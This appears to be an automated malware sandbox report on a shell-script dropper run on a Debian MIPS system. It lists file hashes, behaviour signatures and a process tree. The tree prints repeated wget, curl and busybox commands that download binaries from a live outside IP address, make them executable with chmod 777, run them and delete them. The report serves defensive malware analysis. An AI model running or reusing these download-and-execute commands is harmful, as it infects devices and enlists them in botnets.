Analysis
-
max time kernel
57s -
max time network
59s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21-11-2024 08:23
Static task
static1
Behavioral task
behavioral1
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh
-
Size
10KB
-
MD5
e77cba9c3f47d7b15e9b253d209804f8
-
SHA1
e918796e98f8176f36de6953579f1eeae1114726
-
SHA256
c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620
-
SHA512
46df2a9573958d69d8541ecdeaab7084018aa20b20bd99c59fe032c3863deb132675b7dfa4a373fa1a929ec58a316e9e8d2709d0204b8fa0ad75f5ee0bd5ad77
-
SSDEEP
192:mfru7FtNOCTpJU7Z5Uy+Iv77jnd87HzD7V9caCOqjnh7gQBhhfv7XjndsHzDV9db:9y2LUR4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 932 chmod 920 chmod 956 chmod 746 chmod 766 chmod 827 chmod 884 chmod 739 chmod 896 chmod 814 chmod 890 chmod 902 chmod 752 chmod 908 chmod 851 chmod 869 chmod 938 chmod 944 chmod 788 chmod 962 chmod 968 chmod 980 chmod 950 chmod 974 chmod 821 chmod 878 chmod 914 chmod 926 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 740 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 747 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 753 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 768 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW 789 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 815 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 822 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 828 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 852 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 870 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 879 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 885 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 891 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 897 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 903 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 909 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 915 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 921 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 927 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 933 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 939 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 945 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 951 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 957 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 963 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 969 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW 975 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 981 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 817 rm 982 rm 793 wget 810 busybox 815 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 977 wget 978 curl 979 busybox 981 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 799 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ curl File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ curl File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl
Processes
-
/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh/tmp/c4daf483f2384fdf2bff7a1e016535e9a3cec0cbb1d46a6f00462421576db620.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:737
-
-
/bin/chmodchmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:745
-
-
/bin/chmodchmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:751
-
-
/bin/chmodchmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:763
-
-
/bin/chmodchmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:785
-
-
/bin/chmodchmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:793
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:810
-
-
/bin/chmodchmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:815
-
-
/bin/rmrm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:817
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:820
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:826
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:848
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:868
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:877
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:883
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:889
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:895
-
-
/bin/chmodchmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:901
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:907
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:913
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:919
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:925
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:931
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:934
-
-
